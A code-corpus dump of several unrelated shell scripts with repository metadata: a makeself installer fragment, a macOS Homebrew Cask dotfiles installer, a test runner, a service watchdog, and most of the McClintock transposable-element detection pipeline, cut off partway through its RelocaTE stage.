cp -r $Client/__init__.py $target/test_scripts/
cp -r $Client/rabbit_mq_scripts/ $target/test_scripts/
cp -r $Server $target
cp -r $install_script $target
cp -r $uninstall_script $target
makeself --bzip2 --target "/opt/BarbiE/" $target BarbiE.bz2.run "Installer for SGX-Barbican server" ./install.sh
| true
|
6ed9b0b6a193bf94c28644de8842fa4c4c02e0b5
|
Shell
|
Gekiboy/dotfiles
|
/.cask
|
UTF-8
| 1,115
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Exit if not OSX
if [ "$(uname -s)" != "Darwin" ]; then
echo "Requires OSX"
exit 1
fi;
# Install Cask
brew tap caskroom/cask
function installcask() {
brew cask install "${@}" 2> /dev/null;
}
# Browsers
installcask firefox
installcask google-chrome
installcask google-chrome-canary
# Data Storage/Transfer
installcask dropbox
installcask google-drive
installcask google-photos-backup
# Misc
installcask keepassx
installcask spectacle
# Media
installcask vlc
installcask steam
installcask spotify
# Messaging
installcask slack
installcask skype
installcask google-hangouts
# Development
installcask unity
installcask iterm2
installcask synergy
installcask cyberduck
installcask dockertoolbox
installcask mysqlworkbench
installcask visual-studio-code
# Java
installcask java
################
# Post Install #
################
unset installcask;
# Add Java versions installed above to Jenv
JENV_DIR=$(brew --prefix jenv)
if [ -d "$JENV_DIR" ]; then
for d in /Library/Java/JavaVirtualMachines/*/; do
jenv add "$d/Contents/Home"
jenv rehash
done
fi
| true
|
e6293c13822a2f0aa2e2193fc01ff9b9c863578b
|
Shell
|
onovy/onovy-mass
|
/tests/run.sh
|
UTF-8
| 495
| 3.875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
DIR=$(dirname "$(readlink -f "$0")")
FAIL=0
PASS=0
for CHECK in $DIR/* ; do
if [ ! -d "$CHECK" ] ; then
continue
fi
CHECK_NAME=$(basename "$CHECK")
echo "######## $CHECK_NAME ########"
pushd "$CHECK" >/dev/null
if ./run.sh ; then
PASS=$((PASS + 1))
else
FAIL=$((FAIL + 1))
fi
popd >/dev/null
echo ""
done
echo ""
if [ "$FAIL" -eq 0 ] ; then
echo "ALL PASS!"
else
echo "!!! FAIL !!!"
exit 1
fi
| true
|
990f75b38dbb53c753d984c2a37bfb39bb6892f3
|
Shell
|
typeg/bashscripts
|
/check_process_and_run/myapp_check.sh
|
UTF-8
| 2,013
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/bash -l
VAULT_HOME=/app/myapp/media/real
HOSTNAME=$(hostname -s)
DBCHECK_FILENAME=$VAULT_HOME/share/db_status.txt
if [ "$1" == "glassfish" ]; then
PROCESS_CHECK_STRING='glassfish.jar'
elif [ "$1" == "mysql" ]; then
PROCESS_CHECK_STRING='mysqld'
elif [ "$1" == "nginx" ]; then
PROCESS_CHECK_STRING='nginx:'
elif [ "$1" == "apache" ]; then
PROCESS_CHECK_STRING='httpd'
else
echo "Usage: myapp_check.sh glassfish|mysql|nginx|apache [-start|-stop|-cron]"
exit 1
fi
PROCESS_NAME=$1
LOG_MONTH=`date +%Y-%m`
LOG_TIME=`date '+%Y-%m-%d %H:%M:%S'`
if [ "$2" == "-cron" ]
then
LOG_FILE=$HOME/shell/logs/myapp_proc_${LOG_MONTH}.log
else
LOG_FILE=/dev/stdout
fi
function start_proc () {
echo "Starting" $PROCESS_NAME >> $LOG_FILE
if [ "$PROCESS_NAME" == "glassfish" ]; then
if [ $(cat $DBCHECK_FILENAME) == "ONLINE" ]; then
asadmin start-domain domain1 >> $LOG_FILE 2>&1
fi
elif [ "$PROCESS_NAME" == "mysql" ]; then
$HOME/db/mysql/startup.sh >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "nginx" ]; then
$HOME/nginx/bin/nginx.sh start >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "apache" ]; then
$HOME/apache/bin/apachectl start >> $LOG_FILE 2>&1
fi
}
function stop_proc () {
echo "Stopping" $PROCESS_NAME >> $LOG_FILE
if [ "$PROCESS_NAME" == "glassfish" ]; then
asadmin stop-domain domain1 >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "mysql" ]; then
$HOME/db/mysql/shutdown.sh >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "nginx" ]; then
$HOME/nginx/bin/nginx.sh stop >> $LOG_FILE 2>&1
elif [ "$PROCESS_NAME" == "apache" ]; then
$HOME/apache/bin/apachectl stop >> $LOG_FILE 2>&1
fi
}
if pgrep -f -u $USER $PROCESS_CHECK_STRING >/dev/null 2>&1
then
echo $LOG_TIME ":" $PROCESS_NAME "is OK" >> $LOG_FILE
if [ "$2" == "-stop" ]; then
stop_proc
fi
else
echo $LOG_TIME ":" $PROCESS_NAME "is not running" >> $LOG_FILE
if [ "$2" == "-cron" ] || [ "$2" == "-start" ]; then
start_proc
fi
fi
| true
|
b4676b20f8f1462eb4b922f7ee9b138f55f105db
|
Shell
|
klaricch/mcclintock
|
/scripts/mcclintock.sh
|
UTF-8
| 30,798
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/bash -l
usage ()
{
echo "McClintock Usage"
echo "This script takes the following inputs and will run 5 different transposable element (TE) detection methods:"
echo "-r : A reference genome sequence in fasta format. [Required]"
echo "-c : The consensus sequences of the TEs for the species in fasta format. [Required]"
echo "-g : The locations of known TEs in the reference genome in GFF 3 format. This must include a unique ID"
echo " attribute for every entry. [Optional]"
echo "-t : A tab delimited file with one entry per ID in the GFF file and two columns: the first containing"
echo " the ID and the second containing the TE family it belongs to. The family should correspond to the"
echo " names of the sequences in the consensus fasta file. [Optional - required if GFF (option -g) is supplied]"
echo "-1 : The absolute path of the first fastq file from a paired end read, this should be named ending _1.fastq. [Required]"
echo "-2 : The absolute path of the second fastq file from a paired end read, this should be named ending _2.fastq. [Required]"
echo "-o : An output folder for the run. If not supplied then the reference genome name will be used. [Optional]"
echo "-b : Retain the sorted and indexed BAM file of the paired end data aligned to the reference genome."
echo "-i : If this option is specified then all sample specific intermediate files will be removed, leaving only"
echo " the overall results. The default is to leave sample specific intermediate files (may require large amounts"
echo " of disk space)"
echo "-C : This option will include the consensus TE sequences as extra chromosomes in the reference file (useful if the "
echo " organism is known to have TEs that are not present in the reference strain). [Optional: default will not include"
echo " this]"
echo "-R : This option will include the reference TE sequences as extra chromosomes in the reference file [Optional: default"
echo " will not include this]"
echo "-m : A string containing the list of software you want the pipeline to use for analysis e.g. \"-m relocate TEMP "
echo " ngs_te_mapper\" will launch only those three methods [Optional: default is to run all methods]"
echo "-p : The number of processors to use for parallel stages of the pipeline. [Optional: default = 1]"
echo "-h : Prints this help guide."
}
# Set default value for processors in case it is not supplied
processors=1
# Default behaviour is to run all methods if no option is supplied
methods="ngs_te_mapper RelocaTE TEMP RetroSeq PoPoolationTE TE-locate"
# If an output folder is not specified then default to adding no extra folder layer
outputfolder=.
# Get the options supplied to the program
while getopts ":r:c:g:t:1:2:o:p:m:hibCR" opt;
do
case $opt in
r)
inputr=$OPTARG
;;
c)
inputc=$OPTARG
;;
g)
inputg=$OPTARG
;;
t)
inputt=$OPTARG
;;
1)
input1=$OPTARG
;;
2)
input2=$OPTARG
;;
o)
outputfolder=$OPTARG
;;
p)
processors=$OPTARG
;;
m)
methods=$OPTARG
;;
C)
addconsensus=on
;;
R)
addrefcopies=on
;;
i)
remove_intermediates=on
;;
b)
save_bam=on
;;
h)
usage
exit 1
;;
\?)
echo "Unknown option: -$OPTARG"
usage
exit 1
;;
:)
echo "Missing option argument for -$OPTARG"
usage
exit 1
;;
esac
done
# Test for presence of required arguments
if [[ -z "$inputr" || -z "$inputc" || -z "$input1" || -z "$input2" ]]
then
echo "A required parameter is missing"
usage
exit 1
fi
# If a GFF file is supplied then a TE family file that links it to the fasta consensus is also needed
if [[ "$inputg" ]]
then
if [[ -z "$inputt" ]]
then
echo "If a GFF file is supplied then a TE family file that links it to the fasta consensus is also needed"
usage
exit 1
fi
fi
# Set up folder structure
printf "\nCreating directory structure...\n\n" | tee -a /dev/stderr
genome=${inputr##*/}
genome=${genome%%.*}
sample=${input1##*/}
sample=${sample%%_1.f*}
test_dir=`pwd`
if [[ ! -d $test_dir/$outputfolder/$genome ]]
then
mkdir $test_dir/$outputfolder/
mkdir $test_dir/$outputfolder/$genome/
mkdir $test_dir/$outputfolder/$genome/reference
fi
mkdir $test_dir/$outputfolder/$genome/$sample
mkdir $test_dir/$outputfolder/$genome/$sample/reads
mkdir $test_dir/$outputfolder/$genome/$sample/bam
mkdir $test_dir/$outputfolder/$genome/$sample/sam
mkdir $test_dir/$outputfolder/$genome/$sample/results
mkdir $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults
# Copy input files in to sample directory
# Copy the reference fasta file to the run folder
reference_genome_file=${inputr##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$reference_genome_file ]]
then
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $inputr 80 $test_dir/$outputfolder/$genome/reference/$reference_genome_file
fi
reference_genome=$test_dir/$outputfolder/$genome/reference/$reference_genome_file
# Copy the TE consesnus fasta file to the run folder
consensus_te_seqs_file=${inputc##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$consensus_te_seqs_file ]]
then
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $inputc 80 $test_dir/$outputfolder/$genome/reference/$consensus_te_seqs_file
fi
consensus_te_seqs=$test_dir/$outputfolder/$genome/reference/$consensus_te_seqs_file
# Create symbolic links for fastq files to save time and space
fastq1_file=${input1##*/}
cp -s $input1 $test_dir/$outputfolder/$genome/$sample/reads/$fastq1_file
fastq1=$test_dir/$outputfolder/$genome/$sample/reads/$fastq1_file
fastq2_file=${input2##*/}
cp -s $input2 $test_dir/$outputfolder/$genome/$sample/reads/$fastq2_file
fastq2=$test_dir/$outputfolder/$genome/$sample/reads/$fastq2_file
# If a GFF is supplied then run the analysis using the GFF and TE hierarchy as input
if [[ $inputg ]]
then
# Copy the te locations file to the run folder
te_locations_file=${inputg##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$te_locations_file ]]
then
# Copy the gff input via a processing step that creates standard columns and layout for rest of pipeline
grep -v '^#' $inputg | awk -F'[\t=;]' 'BEGIN {OFS = "\t"}; {printf $1"\t"$2"\t"; for(x=1;x<=NF;x++) if ($x~"ID") printf $(x+1); print "\t"$4,$5,$6,$7,$8,"ID="}' | awk -F'\t' '{print $0$3";Name="$3";Alias="$3}' > $test_dir/$outputfolder/$genome/reference/$te_locations_file
fi
te_locations=$test_dir/$outputfolder/$genome/reference/$te_locations_file
# Copy the te family file to the run folder
te_families_file=${inputt##*/}
if [[ ! -f $test_dir/$outputfolder/$genome/reference/$te_families_file ]]
then
cp -n $inputt $test_dir/$outputfolder/$genome/reference/$te_families_file
fi
te_families=$test_dir/$outputfolder/$genome/reference/$te_families_file
# Use the GFF to create input for the rest of the pipeline
if [[ ! -f $test_dir/$outputfolder/$genome/reference/"popoolationte_"$genome".fa" ]]
then
bedtools maskfasta -fi $reference_genome -fo $test_dir/$outputfolder/$genome/reference/"popoolationte_"$genome".fa" -bed $te_locations
fi
popoolationte_reference_genome=$test_dir/$outputfolder/$genome/reference/"popoolationte_"$genome".fa"
# Extract sequence of all reference TE copies if this has not already been done
# Cut first line if it begins with #
if [[ ! -f $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta ]]
then
if [[ "$addrefcopies" = "on" ]]
then
bedtools getfasta -name -fi $reference_genome -bed $te_locations -fo $test_dir/$outputfolder/$genome/reference/ref_te_seqs.fasta
te_seqs=$test_dir/$outputfolder/$genome/reference/ref_te_seqs.fasta
fi
if [[ "$addconsensus" = "on" ]]
then
cat $consensus_te_seqs $test_dir/$outputfolder/$genome/reference/ref_te_seqs.fasta > $test_dir/$outputfolder/$genome/reference/all_te_seqs2.fasta
te_seqs=$test_dir/$outputfolder/$genome/reference/all_te_seqs2.fasta
fi
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $te_seqs 80 $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
# PoPoolationTE always needs the full TE sequences
bedtools getfasta -name -fi $reference_genome -bed $te_locations -fo $test_dir/$outputfolder/$genome/reference/popool_ref_te_seqs.fasta
cat $consensus_te_seqs $test_dir/$outputfolder/$genome/reference/popool_ref_te_seqs.fasta > $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs_tmp.fasta
perl scripts/fixfastalinelength.pl $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs_tmp.fasta 80 $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs.fasta
rm $test_dir/$outputfolder/$genome/reference/popool_all_te_seqs_tmp.fasta $test_dir/$outputfolder/$genome/reference/popool_ref_te_seqs.fasta $reference_genome".fai"
fi
all_te_seqs=$test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
popool_te_seqs=$test_dir/$outputfolder/$genome/reference/popool_all_te_seqs.fasta
# The pipeline functions most comprehensively (i.e. dealing with insertions with no copies in the reference genome) if
# the sequences of TEs are added to the end of the genome and reflected in the annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/full_reference.fa ]]
then
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
cat $reference_genome $all_te_seqs > $test_dir/$outputfolder/$genome/reference/full_reference.fa
mv $test_dir/$outputfolder/$genome/reference/full_reference.fa $test_dir/$outputfolder/$genome/reference/$genome".fa"
fi
fi
reference_genome=$test_dir/$outputfolder/$genome/reference/$genome".fa"
# PoPoolationTE always needs the full combination reference
if [[ ! -f $test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa" ]]
then
cat $popoolationte_reference_genome $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
fi
popoolationte_reference_genome=$test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
# Add the locations of the sequences of the consensus TEs to the genome annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/TE-lengths ]]
then
awk -F">" '/^>/ {print $2"\t"$2}' $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/tmp
cat $te_families >> $test_dir/$outputfolder/$genome/reference/tmp
cp $te_families $test_dir/$outputfolder/$genome/reference/"popool_"$te_families_file
cp $te_locations $test_dir/$outputfolder/$genome/reference/"popool_"$te_locations_file
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $all_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $te_locations
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $te_families
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
fi
# PoPoolationTE always needs the full family file and annotation
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $test_dir/$outputfolder/$genome/reference/"popool_"$te_locations_file
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $test_dir/$outputfolder/$genome/reference/"popool_"$te_families_file
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
rm $test_dir/$outputfolder/$genome/reference/tmp
fi
popool_te_locations=$test_dir/$outputfolder/$genome/reference/"popool_"$te_locations_file
popool_te_families=$test_dir/$outputfolder/$genome/reference/"popool_"$te_families_file
# The GFF input is optional, if it is not supplied then RepeatMasker is run to generate the necessary inputs
else
if [[ ! -f $reference_genome".masked" || ! -f $reference_genome".out.gff" ]]
then
# Run RepeatMasker on the genome using the TE database to generate gff annotation
RepeatMasker -pa $processors -lib $consensus_te_seqs -s -gff -nolow -no_is $reference_genome
# RepeatMasker appears to override the custom database names during the ProcessRepeats step so this changes them back for
# Drosophila, more rules like this may be needed for other reference genomes
sed "s/McClintock-int/McClintock/g" $reference_genome".out.gff" > $test_dir/$outputfolder/$genome/reference/tmp
sed "s/POGON1/pogo/g" $test_dir/$outputfolder/$genome/reference/tmp > $reference_genome".out.gff"
perl scripts/fixfastalinelength.pl $reference_genome".masked" 80 $reference_genome".masked2"
mv $reference_genome".masked2" $reference_genome".masked"
fi
popoolationte_reference_genome=$reference_genome".masked"
te_locations=$reference_genome".out.gff"
# Run the perl script to create a hierarchy file that corresponds to the RepeatMasker GFF file.
# (The RepeatMasker file is edited and renamed ID_... in the process)
if [[ ! -f $test_dir/$outputfolder/$genome/reference/hierarchy.tsv ]]
then
perl scripts/hierarchyfromrepeatmasked.pl $te_locations $consensus_te_seqs $test_dir/$outputfolder/$genome/reference/hierarchy.tsv
fi
te_families=$test_dir/$outputfolder/$genome/reference/hierarchy.tsv
mv $te_locations"_ID" $te_locations
consensus_te_seqs=$consensus_te_seqs"_ID"
# Extract sequence of all reference TE copies if this has not already been done
# Cut first line if it begins with #
if [[ ! -f $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta ]]
then
grep -v '^#' $te_locations | awk -F'[\t=;]' 'BEGIN {OFS = "\t"}; {printf $1"\t"$2"\t"; for(x=1;x<=NF;x++) if ($x~"ID") printf $(x+1); print "\t"$4,$5,$6,$7,$8,"ID="}' | awk -F'\t' '{print $0$3";Name="$3";Alias="$3}' > edited.gff
mv edited.gff $te_locations
bedtools getfasta -name -fi $reference_genome -bed $te_locations -fo $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta
# Use script to fix the line length of reference input to 80 characters (needed for samtools index)
perl scripts/fixfastalinelength.pl $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta 80 $test_dir/$outputfolder/$genome/reference/reference_te_seqs2.fasta
mv $test_dir/$outputfolder/$genome/reference/reference_te_seqs2.fasta $test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta $reference_genome".fai"
fi
reference_te_seqs=$test_dir/$outputfolder/$genome/reference/reference_te_seqs.fasta
if [[ ! -f $test_dir/$outputfolder/$genome/reference/popool_te_seqs.fasta ]]
then
if [[ "$addconsensus" = "on" ]]
then
cat $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
fi
if [[ "$addrefcopies" = "on" ]]
then
cat $reference_te_seqs >> $test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
fi
cat $consensus_te_seqs $reference_te_seqs > $test_dir/$outputfolder/$genome/reference/popool_te_seqs.fasta
fi
all_te_seqs=$test_dir/$outputfolder/$genome/reference/all_te_seqs.fasta
popool_te_seqs=$test_dir/$outputfolder/$genome/reference/popool_te_seqs.fasta
# Add the locations of the sequences of the consensus TEs to the genome annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/TE-lengths ]]
then
awk -F">" '/^>/ {print $2"\t"$2}' $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/tmp
cat $te_families >> $test_dir/$outputfolder/$genome/reference/tmp
cp $te_families $test_dir/$outputfolder/$genome/reference/"popool_hierarchy.tsv"
cp $te_locations $test_dir/$outputfolder/$genome/reference/"popool_te_locations.gff"
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $all_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $te_locations
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $te_families
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
fi
# PoPoolationTE always needs the full family file and annotation
awk -F">" '/^>/ {if (seqlen){print seqlen}; printf $2"\t" ;seqlen=0;next; } { seqlen = seqlen +length($0)}END{print seqlen}' $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/TE-lengths
while read TE length
do
echo -e "$TE\treannotate\ttransposable_element\t1\t$length\t.\t+\t.\tID=instance$TE;Name=instance$TE;Alias=instance$TE" >> $test_dir/$outputfolder/$genome/reference/"popool_te_locations.gff"
awk -vTE=$TE '{ if(TE==$1) print "instance"TE"\t"$2; }' $test_dir/$outputfolder/$genome/reference/tmp >> $test_dir/$outputfolder/$genome/reference/"popool_hierarchy.tsv"
done < $test_dir/$outputfolder/$genome/reference/TE-lengths
rm $test_dir/$outputfolder/$genome/reference/tmp
fi
popool_te_locations=$test_dir/$outputfolder/$genome/reference/"popool_te_locations.gff"
popool_te_families=$test_dir/$outputfolder/$genome/reference/"popool_hierarchy.tsv"
# The pipeline functions most comprehensively (i.e. dealing with insertions with no copies in the reference genome) if
# the sequences of TEs are added to the end of the genome and reflected in the annotation
if [[ ! -f $test_dir/$outputfolder/$genome/reference/full_reference.fa ]]
then
if [[ "$addconsensus" = "on" || "$addrefcopies" = "on" ]]
then
cat $reference_genome $all_te_seqs > $test_dir/$outputfolder/$genome/reference/full_reference.fa
mv $test_dir/$outputfolder/$genome/reference/full_reference.fa $test_dir/$outputfolder/$genome/reference/$genome".fa"
fi
fi
reference_genome=$test_dir/$outputfolder/$genome/reference/$genome".fa"
# PoPoolationTE always needs the full combination reference
if [[ ! -f $test_dir/$outputfolder/$genome/reference/popoolationte_full_reference.fa ]]
then
cat $popoolationte_reference_genome $popool_te_seqs > $test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
fi
popoolationte_reference_genome=$test_dir/$outputfolder/$genome/reference/"popoolationte_full_"$genome".fa"
fi
# If FastQC is installed then launch FastQC on the input fastqs
location=`which fastqc`
if [[ -z "$location" ]]
then
printf "\nFastQC not installed, skipping input quality analysis...\n\n" | tee -a /dev/stderr
else
printf "\nPerforming FastQC analysis...\n\n" | tee -a /dev/stderr
mkdir $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/fastqc_analysis
fastqc -t $processors $fastq1 $fastq2 -o $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/fastqc_analysis
fi
# Create indexes of reference genome if not already made for this genome
if [[ ! -f $reference_genome".fai" ]]
then
samtools faidx $reference_genome
samtools faidx $popoolationte_reference_genome
fi
if [[ ! -f $reference_genome".bwt" ]]
then
bwa index $reference_genome
bwa index $popoolationte_reference_genome
fi
# Create bed file of reference TE locations
if [[ ! -f $test_dir"/"$genome"/reference/reference_TE_locations.bed" ]]
then
awk -F["\t"\;=] '{print $1"\t"$4-1"\t"$5"\t"$10"\t.\t"$7}' $te_locations > $test_dir/$outputfolder/$genome/reference/reference_TE_locations.bed
fi
bed_te_locations_file=$test_dir/$outputfolder/$genome/reference/reference_TE_locations.bed
# Allow case insensitivity for method names
shopt -s nocasematch
if [[ $methods == *TE-locate* || $methods == *TElocate* || $methods == *RetroSeq* || $methods == *TEMP* ]]
then
# Create sam files for input
printf "\nCreating sam alignment...\n\n" | tee -a /dev/stderr
bwa mem -t $processors -v 0 $reference_genome $fastq1 $fastq2 > $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
sam=$test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
# Calculate the median insert size of the sample
printf "\nCalculating median insert size...\n\n" | tee -a /dev/stderr
median_insertsize=`cut -f9 $sam | sort -n | awk '{if ($1 > 0) ins[reads++]=$1; } END { print ins[int(reads/2)]; }'`
printf "\nMedian insert size = $median_insertsize\n\n" | tee -a /dev/stderr
echo $median_insertsize > $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/median_insertsize
if [[ $methods == *RetroSeq* || $methods == *TEMP* ]]
then
# Create bam files for input
printf "\nCreating bam alignment files...\n\n" | tee -a /dev/stderr
samtools view -Sb -t $reference_genome".fai" $sam | samtools sort - $test_dir/$outputfolder/$genome/$sample/bam/$sample
bam=$test_dir/$outputfolder/$genome/$sample/bam/$sample.bam
samtools index $bam
# Get stats of bam file from samtools
samtools flagstat $bam > $test_dir/$outputfolder/$genome/$sample/results/qualitycontrol/bwamem_bamstats.txt
fi
shopt -u nocasematch
# Sort the sam file lexically for TE-locate
printf "\nSorting sam alignment...\n\n" | tee -a /dev/stderr
sort --temporary-directory=$test_dir/$outputfolder/$genome/$sample/sam/ $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam > $test_dir/$outputfolder/$genome/$sample/sam/sorted$sample.sam
rm $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
mv $test_dir/$outputfolder/$genome/$sample/sam/sorted$sample.sam $test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
sam=$test_dir/$outputfolder/$genome/$sample/sam/$sample.sam
sam_folder=$test_dir/$outputfolder/$genome/$sample/sam
fi
shopt -s nocasematch
if [[ $methods == *TE-locate* || $methods == *TElocate* ]]
then
shopt -u nocasematch
################################## Run TE-locate ##################################
printf "\nRunning TE-locate pipeline...\n\n" | tee -a /dev/stderr
# Adjust hierachy levels
cd TE-locate
telocate_te_locations=${te_locations%.*}
telocate_te_locations=$telocate_te_locations"_HL.gff"
if [[ ! -f $telocate_te_locations ]]
then
perl TE_hierarchy.pl $te_locations $te_families Alias
fi
bash runtelocate.sh $sam_folder $reference_genome $telocate_te_locations 2 $sample $median_insertsize $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_telocate"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TE-locate
cp $outputfolder/$sample/*.info $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TE-locate
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving TE-locate intermediate files\n\n"
rm -r $sam_folder
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *RetroSeq* ]]
then
shopt -u nocasematch
################################## Run RetroSeq ##################################
printf "\nRunning RetroSeq pipeline...\n\n" | tee -a /dev/stderr
cd RetroSeq
bash runretroseq.sh $consensus_te_seqs $bam $reference_genome $bed_te_locations_file $te_families $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_retroseq"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RetroSeq
cp $outputfolder/$sample/$sample".calling.PE.vcf" $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RetroSeq
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving RetroSeq intermediate files\n\n"
# If the save bam option is specified then override the command to delete the bam files.
if [[ "$save_bam" != "on" ]]
then
rm -r $test_dir/$outputfolder/$genome/$sample/bam
fi
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *TEMP* ]]
then
shopt -u nocasematch
################################## Run TEMP ##################################
printf "\nRunning TEMP pipeline...\n\n" | tee -a /dev/stderr
cd TEMP
bash runtemp.sh $bam $sam $consensus_te_seqs $bed_te_locations_file $te_families $median_insertsize $sample $processors $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_temp"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TEMP
cp $outputfolder/$sample/$sample".insertion.refined.bp.summary" $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/TEMP
# If cleanup intermediate files is specified then delete all intermediate files specific to the sample
# i.e. leave any reusable species data behind.
if [[ "$remove_intermediates" = "on" ]]
then
printf "\nRemoving TEMP intermediate files\n\n"
rm -r $outputfolder/$sample
fi
cd ..
fi
shopt -s nocasematch
if [[ $methods == *RelocaTE* ]]
then
shopt -u nocasematch
################################## Run RelocaTE ##################################
printf "\nRunning RelocaTE pipeline...\n\n" | tee -a /dev/stderr
# Add TSD lengths to consensus TE sequences
if [[ ! -f $test_dir/$outputfolder/$genome/reference/relocate_te_seqs.fasta ]]
then
awk '{if (/>/) print $0" TSD=UNK"; else print $0}' $consensus_te_seqs > $test_dir/$outputfolder/$genome/reference/relocate_te_seqs.fasta
fi
relocate_te_seqs=$test_dir/$outputfolder/$genome/reference/relocate_te_seqs.fasta
# Create general gff file to allow reference TE detection in RelocaTE
if [[ ! -f $test_dir/$outputfolder/$genome/reference/relocate_te_locations.gff ]]
then
awk 'FNR==NR{array[$1]=$2;next}{print $1,$2,array[$3],$4,$5,$6,$7,$8,$9}' FS='\t' OFS='\t' $te_families $te_locations > $test_dir/$outputfolder/$genome/reference/relocate_te_locations.gff
fi
relocate_te_locations=$test_dir/$outputfolder/$genome/reference/relocate_te_locations.gff
cd RelocaTE
bash runrelocate.sh $relocate_te_seqs $reference_genome $test_dir/$outputfolder/$genome/$sample/reads $sample $relocate_te_locations $outputfolder
# Save the original result file and the bed files filtered by mcclintock
mv $outputfolder/$sample/$sample"_relocate"* $test_dir/$outputfolder/$genome/$sample/results/
mkdir $test_dir/$outputfolder/$genome/$sample/results/originalmethodresults/RelocaTE
